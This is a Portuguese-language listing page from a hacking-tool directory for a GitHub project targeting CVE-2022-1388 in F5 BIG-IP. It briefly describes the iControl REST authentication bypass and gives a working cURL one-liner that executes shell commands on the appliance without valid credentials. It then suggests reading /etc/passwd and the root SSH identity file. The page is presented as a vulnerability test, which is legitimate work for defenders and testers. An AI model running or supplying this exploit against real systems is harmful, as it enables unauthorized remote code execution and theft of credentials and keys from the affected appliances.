Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/thinkingoffensively/cve-2022-1388
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubthinkingoffensively/cve-2022-1388

CVE-2022-1388

cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE

Ver Repositório
1há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-1388 BIG IP REST RCE

Nas versões F5 BIG-IP 16.1.x anteriores a 16.1.2.2, 15.1.x anteriores a 15.1.5.1, 14.1.x anteriores a 14.1.4.6, 13.1.x anteriores a 13.1.5 e todas as versões 12.1.x e 11.6.x, requisições não divulgadas podem contornar a autenticação do iControl REST.

Use o seguinte comando cURL de uma linha para testar esta vulnerabilidade.

curl -k --header "Host: 127.0.0.1" --header "Authorization: Basic YWRtaW46YWRtaW4=" --header "X-F5-Auth-Token: asdf" --header "Connection: X-F5-Auth-Token" --header "Content-Type: application/json" https://$IPADDRESS/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

O campo Authorization pode ser qualquer valor codificado em base64. O exemplo acima usa admin:admin. Estes NÃO precisam ser credenciais válidas; se o servidor estiver vulnerável, qualquer valor codificado em base64 funcionará.

Se o comando acima retornar o ID, você pode tentar várias coisas, como ler /etc/passwd com 'cat /etc/passwd', ou tentar obter o certificado SSH root com 'cat /root/.ssh/identity'.

Baixar ferramenta